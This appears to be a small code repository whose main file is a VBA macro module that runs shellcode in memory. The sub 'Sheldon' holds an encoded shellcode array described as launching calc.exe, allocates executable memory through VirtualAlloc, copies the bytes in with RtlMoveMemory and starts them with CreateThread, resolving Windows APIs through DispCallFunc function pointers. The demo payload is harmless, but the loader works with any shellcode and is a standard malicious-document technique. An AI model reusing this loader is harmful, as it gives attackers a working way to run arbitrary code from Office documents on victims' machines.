├── FunctionPointers.bas
├── README.md
└── VBAFunctionPointers.jpg


/FunctionPointers.bas:
--------------------------------------------------------------------------------
 1 | Attribute VB_Name = "Module1"
 2 | Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As Long, ByVal offsetinVft As Long, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As Long, ByRef retVAR As Variant) As Long
 3 | Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
 4 | Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
 5 | 
 6 | Const CC_STDCALL = 4
 7 | Const MEM_COMMIT = &H1000
 8 | Const PAGE_EXECUTE_READWRITE = &H40
 9 | 
10 | Private VType(0 To 63) As Integer, VPtr(0 To 63) As Long
11 | 
12 | 'Credits
13 | 'http://exceldevelopmentplatform.blogspot.com/2017/05/dispcallfunc-opens-new-door-to-com.html
14 | 'http://www.freevbcode.com/ShowCode.asp?ID=1863
15 |   
16 | Sub Sheldon()
17 |     
18 |     Dim lpMemory As Long
19 |     Dim lResult As Long
20 |     
21 |     'Shellcode pops calc.exe
22 |     ShellCode = Array(Chr(&HDA), Chr(&HD5), Chr(&HB8), Chr(&H2E), Chr(&H72), Chr(&H68), Chr(&H42), Chr(&HD9), Chr(&H74), Chr(&H24), Chr(&HF4), Chr(&H5B), Chr(&H31), Chr(&HC9), Chr(&HB1), _
23 |             Chr(&H31), Chr(&H83), Chr(&HEB), Chr(&HFC), Chr(&H31), Chr(&H43), Chr(&H14), Chr(&H3), Chr(&H43), Chr(&H3A), Chr(&H90), Chr(&H9D), Chr(&HBE), Chr(&HAA), Chr(&HD6), _
24 |             Chr(&H5E), Chr(&H3F), Chr(&H2A), Chr(&HB7), Chr(&HD7), Chr(&HDA), Chr(&H1B), Chr(&HF7), Chr(&H8C), Chr(&HAF), Chr(&HB), Chr(&HC7), Chr(&HC7), Chr(&HE2), Chr(&HA7), _
25 |             Chr(&HAC), Chr(&H8A), Chr(&H16), Chr(&H3C), Chr(&HC0), Chr(&H2), Chr(&H18), Chr(&HF5), Chr(&H6F), Chr(&H75), Chr(&H17), Chr(&H6), Chr(&HC3), Chr(&H45), Chr(&H36), _
26 |             Chr(&H84), Chr(&H1E), Chr(&H9A), Chr(&H98), Chr(&HB5), Chr(&HD0), Chr(&HEF), Chr(&HD9), Chr(&HF2), Chr(&HD), Chr(&H1D), Chr(&H8B), Chr(&HAB), Chr(&H5A), Chr(&HB0), _
27 |             Chr(&H3C), Chr(&HD8), Chr(&H17), Chr(&H9), Chr(&HB6), Chr(&H92), Chr(&HB6), Chr(&H9), Chr(&H2B), Chr(&H62), Chr(&HB8), Chr(&H38), Chr(&HFA), Chr(&HF9), Chr(&HE3), _
28 |             Chr(&H9A), Chr(&HFC), Chr(&H2E), Chr(&H98), Chr(&H92), Chr(&HE6), Chr(&H33), Chr(&HA5), Chr(&H6D), Chr(&H9C), Chr(&H87), Chr(&H51), Chr(&H6C), Chr(&H74), Chr(&HD6), _
29 |             Chr(&H9A), Chr(&HC3), Chr(&HB9), Chr(&HD7), Chr(&H68), Chr(&H1D), Chr(&HFD), Chr(&HDF), Chr(&H92), Chr(&H68), Chr(&HF7), Chr(&H1C), Chr(&H2E), Chr(&H6B), Chr(&HCC), _
30 |             Chr(&H5F), Chr(&HF4), Chr(&HFE), Chr(&HD7), Chr(&HC7), Chr(&H7F), Chr(&H58), Chr(&H3C), Chr(&HF6), Chr(&HAC), Chr(&H3F), Chr(&HB7), Chr(&HF4), Chr(&H19), Chr(&H4B), _
31 |             Chr(&H9F), Chr(&H18), Chr(&H9F), Chr(&H98), Chr(&HAB), Chr(&H24), Chr(&H14), Chr(&H1F), Chr(&H7C), Chr(&HAD), Chr(&H6E), Chr(&H4), Chr(&H58), Chr(&HF6), Chr(&H35), _
32 |             Chr(&H25), Chr(&HF9), Chr(&H52), Chr(&H9B), Chr(&H5A), Chr(&H19), Chr(&H3D), Chr(&H44), Chr(&HFF), Chr(&H51), Chr(&HD3), Chr(&H91), Chr(&H72), Chr(&H38), Chr(&HB9), _
33 |             Chr(&H64), Chr(&H0), Chr(&H46), Chr(&H8F), Chr(&H67), Chr(&H1A), Chr(&H49), Chr(&HBF), Chr(&HF), Chr(&H2B), Chr(&HC2), Chr(&H50), Chr(&H57), Chr(&HB4), Chr(&H1), _
34 |             Chr(&H15), Chr(&HA7), Chr(&HFE), Chr(&H8), Chr(&H3F), Chr(&H20), Chr(&HA7), Chr(&HD8), Chr(&H2), Chr(&H2D), Chr(&H58), Chr(&H37), Chr(&H40), Chr(&H48), Chr(&HDB), _
35 |             Chr(&HB2), Chr(&H38), Chr(&HAF), Chr(&HC3), Chr(&HB6), Chr(&H3D), Chr(&HEB), Chr(&H43), Chr(&H2A), Chr(&H4F), Chr(&H64), Chr(&H26), Chr(&H4C), Chr(&HFC), Chr(&H85), _
36 |             Chr(&H63), Chr(&H2F), Chr(&H63), Chr(&H16), Chr(&HEF), Chr(&H9E), Chr(&H6), Chr(&H9E), Chr(&H8A), Chr(&HDE))
37 |     
38 |     lpMemory = stdCallA("kernel32", "VirtualAlloc", vbLong, 0&, UBound(ShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
39 |     
40 |     For iArray = LBound(ShellCode) To UBound(ShellCode)
41 |         bytestowrite = ShellCode(iArray)
42 |         lResult = stdCallA("kernel32", "RtlMoveMemory", vbLong, lpMemory + iArray, bytestowrite, 1)
43 |     Next iArray
44 |    
45 |     lResult = stdCallA("kernel32", "CreateThread", vbLong, 0&, 0&, lpMemory, 0&, 0&, 0&)
46 | 
47 | End Sub
48 | 
49 | Public Function stdCallA(sDll As String, sFunc As String, ByVal RetType As VbVarType, ParamArray P() As Variant)
50 | 
51 |     Dim i As Long, pFunc As Long, V(), HRes As Long
52 |     ReDim V(0)
53 |   
54 |     V = P
55 |     
56 |     For i = 0 To UBound(V)
57 |         If VarType(P(i)) = vbString Then P(i) = StrConv(P(i), vbFromUnicode): V(i) = StrPtr(P(i))
58 |             VType(i) = VarType(V(i))
59 |             VPtr(i) = VarPtr(V(i))
60 |         Next i
61 |   
62 |     HRes = DispCallFunc(0, GetProcAddress(LoadLibrary(sDll), sFunc), CC_STDCALL, RetType, i, VType(0), VPtr(0), stdCallA)
63 |   
64 | End Function
65 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # VBAFunctionPointers


--------------------------------------------------------------------------------
/VBAFunctionPointers.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rmdavy/VBAFunctionPointers/403c4b9aa12855fbdddf9bfb2ea357bf5b9dfb37/VBAFunctionPointers.jpg


--------------------------------------------------------------------------------